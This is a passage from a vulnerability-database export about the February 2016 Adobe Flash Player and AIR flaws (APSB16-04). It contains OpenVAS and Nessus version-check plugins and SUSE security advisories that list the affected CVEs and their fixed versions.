"CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2016-02-10T00:00:00", "id": "OPENVAS:1361412562310806866", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806866", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Mac OS X)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806866\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-10 13:23:06 +0530 (Wed, 10 Feb 2016)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities\n\n - Multiple use-after-free vulnerabilities\n\n - A heap buffer overflow vulnerability\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will\n potentially allow an attacker to take control of the affected system,\n 
which could lead to code execution.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.329 or 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"19.0\", test_version2:\"20.0.0.305\"))\n{\n fix = \"20.0.0.306\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.329\"))\n{\n fix = \"18.0.0.329\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 
(bsc#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\n\n", "edition": 1, "modified": "2016-02-10T13:12:35", "published": "2016-02-10T13:12:35", "id": "SUSE-SU-2016:0400-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00027.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "edition": 1, "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (boo#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\n\n", "modified": "2016-02-10T22:11:01", "published": "2016-02-10T22:11:01", "id": "OPENSUSE-SU-2016:0412-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00029.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (bsc#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\n\n", "edition": 1, "modified": "2016-02-10T13:11:33", "published": "2016-02-10T13:11:33", "id": "SUSE-SU-2016:0398-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00025.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (bsc#965901):\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, 
CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984, CVE-2016-0985\n\n", "edition": 1, "modified": "2016-02-11T12:11:42", "published": "2016-02-11T12:11:42", "id": "OPENSUSE-SU-2016:0415-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00030.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-20T12:29:58", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (bsc#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-12T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2016-186)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2016-02-12T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", 
"p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-186.NASL", "href": "https://www.tenable.com/plugins/nessus/88706", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-186.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88706);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-186)\");\n script_summary(english:\"Check for the openSUSE-2016-186 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (bsc#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.569-153.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.569-153.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.569-153.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:29:58", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (boo#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, 
CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-11T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-2016-183)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2016-02-11T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player"], "id": "OPENSUSE-2016-183.NASL", "href": "https://www.tenable.com/plugins/nessus/88688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-183.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88688);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", 
\"CVE-2016-0984\", \"CVE-2016-0985\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-183)\");\n script_summary(english:\"Check for the openSUSE-2016-183 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.569 (boo#965901) :\n\n - APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0971, CVE-2016-0972,\n CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978,\n CVE-2016-0979, CVE-2016-0980, CVE-2016-0981,\n CVE-2016-0982, CVE-2016-0983, CVE-2016-0984,\n CVE-2016-0985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.569-2.88.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.569-2.88.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.569-2.88.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:15:57", "description": "The version of Adobe AIR installed on the remote Windows host is prior\nor equal to version 20.0.0.233. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. (CVE-2016-0971)\n\n - Multiple memory corruption issues exist that allow a\n remote attacker to execute arbitrary code.\n (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966,\n CVE-2016-0967, CVE-2016-0968, CVE-2016-0969,\n CVE-2016-0970, CVE-2016-0972, CVE-2016-0976,\n CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, CVE-2016-0981)", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-09T00:00:00", "title": "Adobe AIR <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB16-04.NASL", "href": "https://www.tenable.com/plugins/nessus/88638", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88638);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 
2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-0964\",\n \"CVE-2016-0965\",\n \"CVE-2016-0966\",\n \"CVE-2016-0967\",\n \"CVE-2016-0968\",\n \"CVE-2016-0969\",\n \"CVE-2016-0970\",\n \"CVE-2016-0971\",\n \"CVE-2016-0972\",\n \"CVE-2016-0973\",\n \"CVE-2016-0974\",\n \"CVE-2016-0975\",\n \"CVE-2016-0976\",\n \"CVE-2016-0977\",\n \"CVE-2016-0978\",\n \"CVE-2016-0979\",\n \"CVE-2016-0980\",\n \"CVE-2016-0981\",\n \"CVE-2016-0982\",\n \"CVE-2016-0983\",\n \"CVE-2016-0984\",\n \"CVE-2016-0985\"\n );\n\n script_name(english:\"Adobe AIR <= 20.0.0.233 Multiple Vulnerabilities (APSB16-04)\");\n script_summary(english:\"Checks the version of AIR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Windows host is prior\nor equal to version 20.0.0.233. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A type confusion error exists that allows a remote\n attacker to execute arbitrary code. (CVE-2016-0985)\n\n - Multiple use-after-free errors exist that allow a remote\n attacker to execute arbitrary code. (CVE-2016-0973,\n CVE-2016-0974, CVE-2016-0975, CVE-2016-0982,\n CVE-2016-0983, CVE-2016-0984)\n\n - A heap buffer overflow condition exist that allows an \n attacker to execute arbitrary code. 
